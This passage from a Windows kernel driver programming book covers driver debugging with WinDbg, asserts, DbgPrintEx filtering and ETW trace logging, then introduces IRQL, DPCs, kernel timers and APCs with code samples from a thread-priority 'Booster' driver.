fffff802`13da10af
[D:\Dev\Chapter04\Booster\Booster.cpp @\
65] 0001 (0001) Booster!BoosterWrite+0x1f
Enter the g command to release the target, and then run the boost application with some thread ID and
priority:
c:\Test> boost 5964 30
The breakpoint within BoosterWrite should hit:
Breakpoint 2 hit
Booster!BoosterWrite+0x1f:
fffff802`13da10af 488b4c2468
mov
rcx,qword ptr [rsp+68h]
You can continue debugging normally, looking at local variables, stepping over/into functions, etc.
Finally, if you would like to disconnect from the target, enter the .detach command. If it does not resume
the target, click the Stop Debugging toolbar button (you may need to click it multiple times).
Asserts and Tracing
Although using a debugger is sometimes necessary, some coding can go a long way in making a debugger
less needed. In this section we’ll examine asserts and powerful logging that is suitable for both debug and
release builds of a driver.
Asserts
Just like in user mode, asserts can be used to verify that certain assumptions are correct. An invalid
assumption means something is very wrong, so it’s best to stop. The WDK header provides the NT_ASSERT
macro for this purpose.
NT_ASSERT accepts something that can be converted to a Boolean value. If the result is non-zero (true),
execution continues. Otherwise, the assertion has failed, and the system takes one of the following actions:
• If a kernel debugger is attached, an assertion failure breakpoint is raised, allowing debugging the
assertion.
• If a kernel debugger is not attached, the system bugchecks. The resulting dump file will poinpoint
the exact line where the assertion has failed.
Here is a simple assert usage added to the DriverEntry function in the Booster driver from chapter 4:
Chapter 5: Debugging and Tracing
115
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
DriverObject->DriverUnload = BoosterUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] = BoosterCreateClose;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = BoosterCreateClose;
DriverObject->MajorFunction[IRP_MJ_WRITE] = BoosterWrite;
UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\Booster");
PDEVICE_OBJECT DeviceObject;
NTSTATUS status = IoCreateDevice(
DriverObject,
// our driver object
0,
// no need for extra bytes
&devName,
// the device name
FILE_DEVICE_UNKNOWN,
// device type
0,
// characteristics flags
FALSE,
// not exclusive
&DeviceObject);
// the resulting pointer
if (!NT_SUCCESS(status)) {
KdPrint(("Failed to create device object (0x%08X)\n", status));
return status;
}
NT_ASSERT(DeviceObject);
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\Booster");
status = IoCreateSymbolicLink(&symLink, &devName);
if (!NT_SUCCESS(status)) {
KdPrint(("Failed to create symbolic link (0x%08X)\n", status));
IoDeleteDevice(DeviceObject);
return status;
}
NT_ASSERT(NT_SUCCESS(status));
return STATUS_SUCCESS;
}
The first assert makes sure the device object pointer is non-NULL:
NT_ASSERT(DeviceObject);
The second makes sure the status at the end of DriverEntry is a successful one:
Chapter 5: Debugging and Tracing
116
NT_ASSERT(NT_SUCCESS(status));
NT_ASSERT only compiles its expression in Debug builds, which makes using asserts practically free from
a performance standpoint, as these will not be part of the final released driver. This also means you need
to be careful that the expression inside NT_ASSERT has no side effects. For example, the following code
is wrong:
NT_ASSERT(NT_SUCCESS(IoCreateSymbolicLink(...)));
This is because the call to IoCreateSymbolicLink will disappear completely in Release build. The
correct way to assert would be something like the following:
status = IoCreateSymbolicLink(...);
NT_ASSERT(NT_SUCCESS(status));
Asserts are useful and should be used liberally because they only have an effect in Debug builds.
Extended DbgPrint
We’ve seen usage of the DbgPrint function (and the KdPrint macro) to generate output that can be
viewed with the kernel debugger or a comparable tool, such as DebugView. This works, and is simple to
use, but has some significant downsides:
• All the output is generated - there is no easy way to filter output to show just some output (such
as errors and warnings only). This is partially mitigated with the extended DbgPrintEx function
described in the next paragraph.
• DbgPrint(Ex) is a relatively slow function, which is why it’s mostly used with KdPrint so that
the overhead is removed in Release builds. But output in Release builds could be very important.
Some bugs may only happen in Release builds, where good output could be useful for diagnosing
issues.
• There is no semantic meaning associated with DbgPrint - it’s just text. There is no way to add
values with property name or type information.
• There is no built-in way to save the output to a file rather than just see it in the debugger. if using
DebugView, it allows saving its output to a file.
The output from DbgPrint(Ex) is limited to 512 bytes. Any remaining bytes are lost.
The DbgPrintEx function (and the associated KdPrintEx macro) were added to provide some filtering
support for DbgPrint output:
Chapter 5: Debugging and Tracing
117
ULONG DbgPrintEx (
_In_ ULONG ComponentId,
_In_ ULONG Level,
_In_z_ _Printf_format_string_ PCSTR Format,
...);
// any number of args
A list of component Ids is present in the <dpfilter.h> header (common to user and kernel mode), currently
containing 155 valid values (0 to 154). Most values are used by the kernel and Microsoft drivers, except for
a handlful that are meant to be used by third-party drivers:
• DPFLTR_IHVVIDEO_ID (78) - for video drivers.
• DPFLTR_IHVAUDIO_ID (79) - for audio drivers.
• DPFLTR_IHVNETWORK_ID (80) - for network drivers.
• DPFLTR_IHVSTREAMING_ID (81) - for streaming drivers.
• DPFLTR_IHVBUS_ID (82) - for bus drivers.
• DPFLTR_IHVDRIVER_ID (77) - for all other drivers.
• DPFLTR_DEFAULT_ID (101) - used with DbgPrint or if an illegal component number is used.
For most drivers, the DPFLTR_IHVDRIVER_ID component ID should be used.
The Level parameter indicates the severity of the message (error, warning, information, etc.), but can
technically mean anything you want. The interpretation of this value depends on whether the value is
between 0 and 31, or greater than 31:
• 0 to 31 - the level is a single bit formed by the expression 1 << Level. For example, if Level is 5,
then the value is 32.
• Anything greater than 31 - the value is used as is.
<dpfilter.h> defines a few constants that can be used as is for Level:
#define DPFLTR_ERROR_LEVEL
0
#define DPFLTR_WARNING_LEVEL 1
#define DPFLTR_TRACE_LEVEL
2
#define DPFLTR_INFO_LEVEL
3
You can define more (or different) values as needed. The final result of whether the output will make its
way to its destination depends on the component ID, the bit mask formed by the Level argument, and on
a global mask read from the Debug Print Filter Registry key at system startup. Since the Debug Print Filter
key does not exist by default, there is a default value for all component IDs, which is zero. This means that
actual level value is 1 (1 << 0). The output will go through if either of the following conditions is true
(value is the value specified by the Level argument to DbgPrintEx):
• If value & (Debug print Filter value for that component) is non-zero, the output
goes through. With the default, it’s (value & 1) != 0.
Chapter 5: Debugging and Tracing
118
• If the result of the value ANDed with the Level of the ComponentId is non-zero, the output goes
through.
If neither is true, the output is dropped.
Setting the component ID level can be done in one of three ways:
• Using the Debug Print Filter key under HKLM\System\CCS\Control\Session Manager. DWORD values
can be specified where their name is the macro name of a component ID without the prefix or suffix.
For example, for DPFLTR_IHVVIDEO_ID, you would set the name to “IHVVIDEO”.
• If a kernel debugger is connected, the level of a component can be changed during debugging. For
example, the following command changes the level of DPFLTR_IHVVIDEO_ID to 0x1ff:
ed Kd_IHVVIDEO_Mask 0x1ff
The Debug Print Filter value can also be changed with the kernel debugger by using the global
kernel variable Kd_WIN2000_Mask.
• The last option is to make the change through the NtSetDebugFilterState native API. It’s
undocumented, but it may be useful in practice. The Dbgkflt tool, available in the Tools folder in
the book’s samples repositpry, makes use of this API (and its query counterpart, NtQueryDebug-
FilterState), so that changes can be made even if a kernel debugger is not attached.
If NtSetDebugFilterState is called from user mode, the caller must have the Debug privilege in
its token. Since administrators have this privilege by default (but not non-admin users), you must run
dbgkflt from an elevated command window for the change to succeed.
The kernel-mode APIs provided by the <wdm.h> are DbgQueryDebugFilterState and
DbgSetDebugFilterState. These are still undocumented, but at least their declaration is
available. They use the same parameters and return type as their native invokers. This means
you can call these APIs from the driver itself if desired (perhaps based on configuration read
from the Registry).
Chapter 5: Debugging and Tracing
119
Using Dbgkflt
Running Dbgkflt with no arguments shows its usage.
To query the effective level of a given component, add the component name (without the prefix or suffix).
For example:
dbgkflt default
This returns the effective bits for the DPFLTR_DEFAULT_ID component. To change the value to
something else, specify the value you want. It’s always ORed with 0x80000000 so that the bits you
specify are directly used, rather than interpreting numbers lower than 32 as (1 << number). For
example, the following sets the first 4 bits for the DEFAULT component:
dbgkflt default 0xf
DbgPrint is just a shortcut that calls DbgPrintEx with the DPFLTR_DEFAULT_ID component like so
(this is conceptual and will not compile):
ULONG DbgPrint (PCSTR Format, arguments) {
return DbgPrintEx(DPFLTR_DEFAULT_ID, DPFLTR_INFO_LEVEL, Format, arguments);
}
This explains why the DWORD named DEFAULT with a value of 8 (1 << DPFLTR_INFO_LEVEL) is the
value to write in the Registry to get DbgPrint output to go through.
Given the above details, a driver can use DbgPrintEx (or the KdPrintEx macro) to specify different
levels so that output can be filtered as needed. Each call, however, may be somewhat verbose. For example:
DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
"Booster: DriverEntry called. Registry Path: %wZ\n", RegistryPath);
Obviously, we might prefer a simpler function that always uses DPFLTR_IHVDRIVER_ID (the one that
should be used for generic third-party drivers), like so:
Log(DPFLTR_INFO_LEVEL,
"Booster: DriverEntry called. Registry Path: %wZ\n", RegistryPath);
We can go even further by defining specific functions that use the a log level implicitly:
LogInfo("Booster: DriverEntry called. Registry Path: %wZ\n", RegistryPath);
Here is an example where we define several bits to be used by creating an enumeration (there is no necessity
to used the defined ones):
Chapter 5: Debugging and Tracing
120
enum class LogLevel {
Error = 0,
Warning,
Information,
Debug,
Verbose
};
Each value is associated with a small number (below 32), so that the values are interpreted as powers of
two by DbgPrintEx. Now we can define functions like the following:
ULONG Log(LogLevel level, PCSTR format, ...);
ULONG LogError(PCSTR format, ...);
ULONG LogWarning(PCSTR format, ...);
ULONG LogInfo(PCSTR format, ...);
ULONG LogDebug(PCSTR format, ...);
and so on. Log is the most generic function, while the others use a predefined log level. Here is the
implementation of the first two functions:
#include <stdarg.h>
ULONG Log(LogLevel level, PCSTR format, ...) {
va_list list;
va_start(list, format);
return vDbgPrintEx(DPFLTR_IHVDRIVER_ID,
static_cast<ULONG>(level), format, list);
}
ULONG LogError(PCSTR format, ...) {
va_list list;
va_start(list, format);
return vDbgPrintEx(DPFLTR_IHVDRIVER_ID,
static_cast<ULONG>(LogLevel::Error), format, list);
}
The use of static_cast in the above code is required in C++, as scoped enums don’t
automatically convert to integers. You can use a C-style cast instead, if you prefer. If you’re
using pure C, change the scoped enum to a standard enum (remove the class keyword).
The return value from the various DbgPrint variants is typed as a ULONG, but is in fact a
standard NTSTATUS.
Chapter 5: Debugging and Tracing
121
The implementation uses the classic C variable arguments ellipsis (...) and implements these as you
would in standard C. The implementation calls vDbgPrintEx that accepts a va_list, which is necessary
for this to work correctly.
It’s possible to create something more elaborate using the C++ variadic template feature. This
is left as an exercise to the interested (and enthusiastic) reader.
The above code can be found in the Booster2 project, part of the samples for this chapter. As part of that
project, here are a few examples where these functions are used:
// in DriverEntry
Log(LogLevel::Information, "Booster2: DriverEntry called. Registry Path: %wZ\n"\
,
RegistryPath);
// unload routine
LogInfo("Booster2: unload called\n");
// when an error is encountered creating a device object
LogError("Failed to create device object (0x%08X)\n", status);
// error locating thread ID
LogError("Failed to locate thread %u (0x%X)\n",
data->ThreadId, status);
// success in changing thread priority
LogInfo("Priority for thread %u changed from %d to %d\n",
data->ThreadId, oldPriority, data->Priority);
Other Debugging Functions
The previous section used vDebugPrintEx, defined like so:
ULONG vDbgPrintEx(
_In_ ULONG ComponentId,
_In_ ULONG Level,
_In_z_ PCCH Format,
_In_ va_list arglist);
It’s identical to DbgPrintEx, except its last argument is an already constructed va_list. A wrapper
macro exists as well - vKdPrintEx (compiled in Debug builds only).
Lastly, there is yet another extended function for printing - cDbgPrintExWithPrefix:
Chapter 5: Debugging and Tracing
122
ULONG vDbgPrintExWithPrefix (
_In_z_ PCCH Prefix,
_In_ ULONG ComponentId,
_In_ ULONG Level,
_In_z_ PCCH Format,
_In_ va_list arglist);
It adds a prefix (first parameter) to the output. This is useful to distinguish our driver from other drivers
using the same functions. It also allows easy filtering in tools such as DebugView. For example, this code
snippet shown earlier uses an explicit prefix:
LogInfo("Booster2: unload called\n");
We can define one as a macro, and use it as the first word in any output like so:
#define DRIVER_PREFIX "Booster2: "
LogInfo(DRIVER_PREFIX "unload called\n");
This works, but it could be nicer by adding the prefix in every call automatically, by calling vDbgPrint-
ExWithPrefix instead of vDbgPrintEx in the Log implementations. For example:
ULONG Log(LogLevel level, PCSTR format, ...) {
va_list list;
va_start(list, format);
return vDbgPrintExWithPrefix("Booster2", DPFLTR_IHVDRIVER_ID,
static_cast<ULONG>(level), format, list);
}
Complete the implementation of the Log functions variants.
Trace Logging
Using DbgPrint and its variants is convenient enough, but as discussed earlier has some drawbacks.
Trace logging is a powerful alternative (or complementary) that uses Event Tracing for Windows (ETW)
for logging purposes, that can be captured live or to a log file. ETW has the additional benefits of being
performant (can be used to log thousands of events per second without any noticeable delay), and has
semantic information not available with the simple strings generated by the DbgPrint functions.
Chapter 5: Debugging and Tracing
123
Trace logging can be used in exactly the same way in user mode as well.
ETW is beyond the scope of this book. You can find more information in the official
documentation or in my book “Windows 10 System Programming, Part 2”.
To get started with trace logging, an ETW provider has to be defined. Contrary to “classic” ETW, no
provider registration is necessary, as trace logging ensures the even metadata is part of the logged
information, and as such is self-contained.
A provider must have a unique GUID. You can generate one with the Create GUID tool available with
Visual Studio (Tools menu). Figure 5-11 shows a screenshot of the tool with the second radio button selected,
as it’s the closest to the format we need. Click the Copy button to copy that text to the clipboard.
Figure 5-11: The Create GUID tool
Paste the text to the main source file of the driver and change the pasted macro to TRACELOGGING_-
DEFINE_PROVIDER to look like this:
Chapter 5: Debugging and Tracing
124
// {B2723AD5-1678-446D-A577-8599D3E85ECB}
TRACELOGGING_DEFINE_PROVIDER(g_Provider, "Booster", \
(0xb2723ad5, 0x1678, 0x446d, 0xa5, 0x77, 0x85, 0x99, 0xd3, 0xe8, 0x5e, 0xcb\
));
g_Provider is a global variable created to represent the ETW provider, where “Booster” is set as its
friendly name.
You will need to add the following #includes (these are common with user-mode):
#include <TraceLoggingProvider.h>
#include <evntrace.h>
In DriverEntry, call TraceLoggingRegister to register the provider:
TraceLoggingRegister(g_Provider);
Similarly, the provider should be deregistered in the unload routine like so:
TraceLoggingUnregister(g_Provider);
The logging is done with the TraceLoggingWrite macro that is provided a variable number of
arguments using another set of macros that provide convenient usage for typed properties. Here is an
example of a logging call in DriverEntry:
TraceLoggingWrite(g_Provider, "DriverEntry started",
// provider, event name
TraceLoggingLevel(TRACE_LEVEL_INFORMATION),
// log level
TraceLoggingValue("Booster Driver", "DriverName"),
// value, name
TraceLoggingUnicodeString(RegistryPath, "RegistryPath"));
// value, name
The above call means the following:
• Use the provider described by g_Provider.
• The event name is “DriverEntry started”.
• The logging level is Information (several levels are defined).
• A property named “DriverName” has the value “Boster Driver”.
• A property named “RegistryPath” has the value of the RegistryPath variable.
Notice the usage of the TraceLoggingValue macro - it’s the most generic and uses the type inferred by
the first argument (the value). Many other type-safe macros exist, such as the TraceLoggingUnicode-
String macro above that ensures its first argument is indeed a UNICODE_STRING.
Here is another example - if symbolic link creation fails:
Chapter 5: Debugging and Tracing
125
TraceLoggingWrite(g_Provider, "Error",
TraceLoggingLevel(TRACE_LEVEL_ERROR),
TraceLoggingValue("Symbolic link creation failed", "Message"),
TraceLoggingNTStatus(status, "Status", "Returned status"));
You can use any “properties” you want. Try to provide the most important details for the event.
Here are a couple of more examples, taken from the Booster project part of the samples for this chapter:
// Create/Close dispatch IRP
TraceLoggingWrite(g_Provider, "Create/Close",
TraceLoggingLevel(TRACE_LEVEL_INFORMATION),
TraceLoggingValue(
IoGetCurrentIrpStackLocation(Irp)->MajorFunction == IRP_MJ_CREATE ?
"Create" : "Close", "Operation"));
// success in changing priority
TraceLoggingWrite(g_Provider, "Boosting",
TraceLoggingLevel(TRACE_LEVEL_INFORMATION),
TraceLoggingUInt32(data->ThreadId, "ThreadId"),
TraceLoggingInt32(oldPriority, "OldPriority"),
TraceLoggingInt32(data->Priority, "NewPriority"));
Viewing ETW Traces
Where do all the above traces go to? Normally, they are just dropped. Someone has to configure listening to
the provider and log the events to a real-time session or a file. The WDK provides a tool called TraceView
that can be used for just that purpose.
You can open a Developer’s Command window and run TraceView.exe directly. If you can’t locate it, it’s
installed by default in a directory such as C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64.
You can copy the executable to the target machine where the driver is supposed to run. When you run
TraceView.exe, an empty window is shown (figure 5-12).
Chapter 5: Debugging and Tracing
126
Figure 5-12: The TraceView.exe tool
Select the File / Create New log Session menu to create a new session. This opens up the dialog shown in
figure 5-13.
Chapter 5: Debugging and Tracing
127
Figure 5-13: New session dialog with a new provider
TraceView provides several methods of locating providers. We can add multiple providers to the same
session to get information from other components in the system. For now, we’ll add our provider by using
the Manually Entered Control GUID option, and type in our GUID (figure 5-14):
Chapter 5: Debugging and Tracing
128
Figure 5-14: Adding a provider GUID manually
Click OK. A dialog will pop up asking the source for decoding information. Use the default Auto option,
as trace logging does not require any outside source. You’ll see the single provider in the Create New Log
Session dialog. Click the Next button. The last step of the wizard allows you to select where the output
should go to: a real-time session (shown with TraceView), a file, or both (figure 5-15).
Chapter 5: Debugging and Tracing
129
Figure 5-15: Output selection for a session
Click Finish. Now you can load/use the driver normally. You should see the output generated in the main
TraceView window (figure 5-16).
Figure 5-16: ETW real-time session in action
You can see the various properties shown in the Message column. When logging to a file, you can open
the file later with TraceView and see what was logged.
There are other ways to use TraceView, and other tools to record and view ETW information. You could
Chapter 5: Debugging and Tracing
130
also write your own tools to parse the ETW log, as the events have semantic information and so can easily
be analyzed.
Summary
In this chapter, we looked at the basics of debugging with WinDbg, as well as tracing activities within the
driver. Debugging is an essential skill to develop, as software of all kinds, including kernel drivers, may
have bugs.
In the next chapter, we’ll delve into some kernel mechanisms we need to get acquainted with, as these
come up frequently while developing and debugging drivers.
Chapter 6: Kernel Mechanisms
This chapter discussed various mechanisms the Windows kernel provides. Some of these are directly useful
for driver writers. Others are mechanisms that a driver developer needs to understand as it helps with
debugging and general understanding of activities in the system.
In this chapter:
• Interrupt Request Level
• Deferred Procedure Calls
• Asynchronous Procedure Calls
• Structured Exception Handling
• System Crash
• Thread Synchronization
• High IRQL Synchronization
• Work Items
Interrupt Request Level (IRQL)
In chapter 1, we discussed threads and thread priorities. These priorities are taken into consideration when
more threads want to execute than there are available processors. At the same time, hardware devices
need to notify the system that something requires attention. A simple example is an I/O operation that is
carried out by a disk drive. Once the operation completes, the disk drive notifies completion by requesting
an interrupt. This interrupt is connected to an Interrupt Controller hardware that then sends the request
to a processor for handling. The next question is, which thread should execute the associated Interrupt
Service Routine (ISR)?
Every hardware interrupt is associated with a priority, called Interrupt Request Level (IRQL) (not to be
confused with an interrupt physical line known as IRQ), determined by the HAL. Each processor’s context
has its own IRQL, just like any register. IRQLs may or may not be implemented by the CPU hardware, but
this is essentially unimportant. IRQL should be treated just like any other CPU register.
The basic rule is that a processor executes the code with the highest IRQL. For example, if a CPU’s IRQL is
zero at some point, and an interrupt with an associated IRQL of 5 comes in, it will save its state (context) in
the current thread’s kernel stack, raise its IRQL to 5 and then execute the ISR associated with the interrupt.
Once the ISR completes, the IRQL will drop to its previous level, resuming the previously executed code
as though the interrupt never happened. While the ISR is executing, other interrupts coming in with an
Chapter 6: Kernel Mechanisms
132
IRQL of 5 or less cannot interrupt this processor. If, on the other hand, the IRQL of the new interrupt is
above 5, the CPU will save its state again, raise IRQL to the new level, execute the second ISR associated
with the second interrupt and when completed, will drop back to IRQL 5, restore its state and continue
executing the original ISR. Essentially, raising IRQL blocks code with equal or lower IRQL temporarily.
The basic sequence of events when an interrupt occurs is depicted in figure 6-1. Figure 6-2 shows what
interrupt nesting looks like.
Figure 6-1: Basic interrupt dispatching
Chapter 6: Kernel Mechanisms
133
Figure 6-2: Nested interrupts
An important fact for the depicted scenarios in figures 6-1 and 6-2 is that execution of all ISRs is done
by the same thread - which got interrupted in the first place. Windows does not have a special thread
to handle interrupts; they are handled by whatever thread was running at that time on the interrupted
processor. As we’ll soon discover, context switching is not possible when the IRQL of the processor is 2 or
higher, so there is no way another thread can sneak in while these ISRs execute.
The interrupted thread does not get its quantum reduced because of these “interruptions”. It’s not its
fault, so to speak.
When user-mode code is executing, the IRQL is always zero. This is one reason why the term IRQL is not
mentioned in any user-mode documentation - it’s always zero and cannot be changed. Most kernel-mode
code runs with IRQL zero as well. It’s possible, however, in kernel mode, to raise the IRQL on the current
processor.
The important IRQLs are described below:
• PASSIVE_LEVEL in WDK (0) - this is the “normal” IRQL for a CPU. User-mode code always runs
at this level. Thread scheduling working normally, as described in chapter 1.
• APC_LEVEL (1) - used for special kernel APCs (Asynchronous Procedure Calls will be discussed later
in this chapter). Thread scheduling works normally.
• DISPATCH_LEVEL (2) - this is where things change radically. The scheduler cannot wake up on this
CPU. Paged memory access is not allowed - such access causes a system crash. Since the scheduler
cannot interfere, waiting on kernel objects is not allowed (causes a system crash if used).
• Device IRQL - a range of levels used for hardware interrupts (3 to 11 on x64/ARM/ARM64, 3 to 26
on x86). All rules from IRQL 2 apply here as well.
Chapter 6: Kernel Mechanisms
134
• Highest level (HIGH_LEVEL) - this is the highest IRQL, masking all interrupts. Used by some APIs
dealing with linked list manipulation. The actual values are 15 (x64/ARM/ARM64) and 31 (x86).
When a processor’s IRQL is raised to 2 or higher (for whatever reason), certain restrictions apply on the
executing code:
• Accessing memory not in physical memory is fatal and causes a system crash. This means accessing
data from non-paged pool is always safe, whereas accessing data from paged pool or from user-
supplied buffers is not safe and should be avoided.
• Waiting on any kernel object (e.g. mutex or event) causes a system crash, unless the wait timeout is
zero, which is still allowed. (we’ll discuss dispatcher object and waiting later in this chapter in the
Thread Synchronization”* section.)
These restrictions are due to the fact that the scheduler “runs” at IRQL 2; so if a processor’s IRQL is already
2 or higher, the scheduler cannot wake up on that processor, so context switches (replacing the running
thread with another on this CPU) cannot occur. Only higher level interrupts can temporarily divert code
into an associated ISR, but it’s still the same thread - no context switch can occur; the thread’s context is
saved, the ISR executes and the thread’s state resumes.
The current IRQL of a processor can be viewed while debugging with the !irql command.
An optional CPU number can be specified, which shows the IRQL of that CPU.
You can view the registered interrupts on a system using the !idt debugger command.
Raising and Lowering IRQL
As previously discussed, in user mode the concept of IRQL is not mentioned and there is no way to
change it. In kernel mode, the IRQL can be raised with the KeRaiseIrql function and lowered back with
KeLowerIrql. Here is a code snippet that raises the IRQL to DISPATCH_LEVEL (2), and then lowers it
back after executing some instructions at this IRQL.
// assuming current IRQL <= DISPATCH_LEVEL
KIRQL oldIrql;
// typedefed as UCHAR
KeRaiseIrql(DISPATCH_LEVEL, &oldIrql);
NT_ASSERT(KeGetCurrentIrql() == DISPATCH_LEVEL);
// do work at IRQL DISPATCH_LEVEL
KeLowerIrql(oldIrql);
If you raise IRQL, make sure you lower it in the same function. It’s too dangerous to return from
a function with a higher IRQL than it was entered. Also, make sure KeRaiseIrql actually
raises the IRQL and KeLowerIrql actually lowers it; otherwise, a system crash will follow.
Chapter 6: Kernel Mechanisms
135
Thread Priorities vs. IRQLs
IRQL is an attribute of a processor. Priority is an attribute of a thread.
Thread priorities only have meaning at IRQL < 2. Once an executing thread raised IRQL to 2 or higher,
its priority does not mean anything anymore - it has theoretically an infinite quantum - it will continue
execution until it lowers the IRQL to below 2.
Naturally, spending a lot of time at IRQL >= 2 is not a good thing; user mode code is not running for sure.
This is just one reason there are severe restrictions on what executing code can do at these levels.
Task Manager shows the amount of CPU time spent in IRQL 2 or higher using a pseudo-process called
System Interrupts; Process Explorer calls it Interrupts. Figure 6-3 shows a screenshot from Task Manager
and figure 6-4 shows the same information in Process Explorer.
Figure 6-3: IRQL 2+ CPU time in Task Manager
Figure 6-4: IRQL 2+ CPU time in Process Explorer
Deferred Procedure Calls
Figure 6-5 shows a typical sequence of events when a client invokes some I/O operation. In this figure,
a user mode thread opens a handle to a file, and issues a read operation using the ReadFile function.
Since the thread can make an asynchronous call, it regains control almost immediately and can do other
work. The driver receiving this request, calls the file system driver (e.g. NTFS), which may call other
drivers below it, until the request reaches the disk driver, which initiates the operation on the actual disk
hardware. At that point, no code needs to execute, since the hardware “does its thing”.
When the hardware is done with the read operation, it issues an interrupt. This causes the Interrupt Service
Routine associated with the interrupt to execute at Device IRQL (note that the thread handling the request
is arbitrary, since the interrupt arrives asynchronously). A typical ISR accesses the device’s hardware to
get the result of the operation. Its final act should be to complete the initial request.
Chapter 6: Kernel Mechanisms
136
Figure 6-5: Typical I/O request processing (part 1)
As we’ve seen in chapter 4, completing a request is done by calling IoCompleteRequest. The problem
is that the documentation states this function can only be called at IRQL <= DISPATCH_LEVEL (2). This
means the ISR cannot call IoCompleteRequest or it will crash the system. So what is the ISR to do?
You may wonder why is there such a restriction. One of the reasons has to do with the work
done by IoCompleteRequest. We’ll discuss this in more detail in the next chapter, but the
bottom line is that this function is relatively expensive. If the call would have been allowed,
that would mean the ISR will take substantially longer to execute, and since it executes in a
high IRQL, it will mask off other interrupts for a longer period of time.
The mechanism that allows the ISR to call IoCompleteRequest (and other functions with similar
limitations) as soon as possible is using a Deferred Procedure Call (DPC). A DPC is an object encapsulating
a function that is to be called at IRQL DISPATCH_LEVEL. At this IRQL, calling IoCompleteRequest is
permitted.
You may wonder why does the ISR not simply lower the current IRQL to DISPATCH_LEVEL,
call IoCompleteRequest, and then raise the IRQL back to its original value. This can cause
a deadlock. We’ll discuss the reason for that later in this chapter in the section Spin Locks.
Chapter 6: Kernel Mechanisms
137
The driver which registered the ISR prepares a DPC in advance, by allocating a KDPC structure from non-
paged pool and initializing it with a callback function using KeInitializeDpc. Then, when the ISR is
called, just before exiting the function, the ISR requests the DPC to execute as soon as possible by queuing
it using KeInsertQueueDpc. When the DPC function executes, it calls IoCompleteRequest. So the
DPC serves as a compromise - it’s running at IRQL DISPATCH_LEVEL, meaning no scheduling can occur,
no paged memory access, etc. but it’s not high enough to prevent hardware interrupts from coming in and
being served on the same processor.
Every processor on the system has its own queue of DPCs. By default, KeInsertQueueDpc queues the
DPC to the current processor’s DPC queue. When the ISR returns, before the IRQL can drop back to zero, a
check is made to see whether DPCs exist in the processor’s queue. If there are, the processor drops to IRQL
DISPATCH_LEVEL (2) and then processes the DPCs in the queue in a First In First Out (FIFO) manner,
calling the respective functions, until the queue is empty. Only then can the processor’s IRQL drop to zero,
and resume executing the original code that was disturbed at the time the interrupt arrived.
DPCs can be customized in some ways. Check out the docs for the functions
KeSetImportantceDpc and KeSetTargetProcessorDpc.
Figure 6-6 augments figure 6-5 with the DPC routine execution.
Chapter 6: Kernel Mechanisms
138
Figure 6-6: Typical I/O request processing (part 2)
Using DPC with a Timer
DPCs were originally created for use by ISRs. However, there are other mechanisms in the kernel that
utilize DPCs.
One such use is with a kernel timer. A kernel timer, represented by the KTIMER structure allows setting
up a timer to expire some time in the future, based on a relative interval or absolute time. This timer is
a dispatcher object and so can be waited upon with KeWaitForSingleObject (discussed later in this
chapter in the section “Synchronization”). Although waiting is possible, it’s inconvenient for a timer. A
simpler approach is to call some callback when the timer expires. This is exactly what the kernel timer
provides using a DPC as its callback.
The following code snippet shows how to configure a timer and associate it with a DPC. When the timer
expires, the DPC is inserted into a CPU’s DPC queue and so executes as soon as possible. Using a DPC is
Chapter 6: Kernel Mechanisms
139
more powerful than a zero IRQL based callback, since it is guaranteed to execute before any user mode
code (and most kernel mode code).
KTIMER Timer;
KDPC TimerDpc;
void InitializeAndStartTimer(ULONG msec) {
KeInitializeTimer(&Timer);
KeInitializeDpc(&TimerDpc,
OnTimerExpired,
// callback function
nullptr);
// passed to callback as "context"
// relative interval is in 100nsec units (and must be negative)
// convert to msec by multiplying by 10000
LARGE_INTEGER interval;
interval.QuadPart = -10000LL * msec;
KeSetTimer(&Timer, interval, &TimerDpc);
}
void OnTimerExpired(KDPC* Dpc, PVOID context, PVOID, PVOID) {
UNREFERENCED_PARAMETER(Dpc);
UNREFERENCED_PARAMETER(context);
NT_ASSERT(KeGetCurrentIrql() == DISPATCH_LEVEL);
// handle timer expiration
}
Asynchronous Procedure Calls
We’ve seen in the previous section that DPCs are objects encapsulating a function to be called at IRQL
DISPATCH_LEVEL. The calling thread does not matter, as far as DPCs are concerned.
Asynchronous Procedure Calls (APCs) are also data structures that encapsulate a function to be called. But
contrary to a DPC, an APC is targeted towards a particular thread, so only that thread can execute the
function. This means each thread has an APC queue associated with it.
There are three types of APCs:
• User mode APCs - these execute in user mode at IRQL PASSIVE_LEVEL only when the thread
goes into alertable state. This is typically accomplished by calling an API such as SleepEx,
WaitForSingleObjectEx, WaitForMultipleObjectsEx and similar APIs. The last argument
to these functions can be set to TRUE to put the thread in alertable state. In this state it looks at its
APC queue, and if not empty - the APCs now execute until the queue is empty.
Chapter 6: Kernel Mechanisms
140
• Normal kernel-mode APCs - these execute in kernel mode at IRQL PASSIVE_LEVEL and preempt
user-mode code (and user-mode APCs).
• Special kernel APCs - these execute in kernel mode at IRQL APC_LEVEL (1) and preempt user-
mode code, normal kernel APCs, and user-mode APCs. These APCs are used by the I/O manager to
complete I/O operations as will be discussed in the next chapter.
The APC API is undocumented in kernel mode (but has been reversed engineered enough to allow usage
if desired).
User-mode can use (user mode) APCs by calling certain APIs. For example, calling
ReadFileEx or WriteFileEx start an asynchronous I/O operation. When the operation
completes, a user-mode APC is attached to the calling thread. This APC will execute when
the thread enters an alertable state as described earlier. Another useful function in user mode
to explicitly generate an APC is QueueUserAPC. Check out the Windows API documentation
for more information.
Critical Regions and Guarded Regions
A Critical Region prevents user mode and normal kernel APCs from executing (special kernel APCs
can still execute). A thread enters a critical region with KeEnterCriticalRegion and leaves it with
KeLeaveCriticalRegion. Some functions in the kernel require being inside a critical region, especially
when working with executive resources (see the section “Executive Resources” later in this chapter).
A Guarded Region prevents all APCs from executing. Call KeEnterGuardedRegion to enter a guarded
region and KeLeaveGuardedRegion to leave it. Recursive calls to KeEnterGuardedRegion must be
matched with the same number of calls to KeLeaveGuardedRegion.
Raising the IRQL to APC_LEVEL disables delivery of all APCs.
Write RAII wrappers for entering/leaving critical and guarded regions.
Structured Exception Handling
An exception is an event that occurs because of a certain instruction that did something that caused the
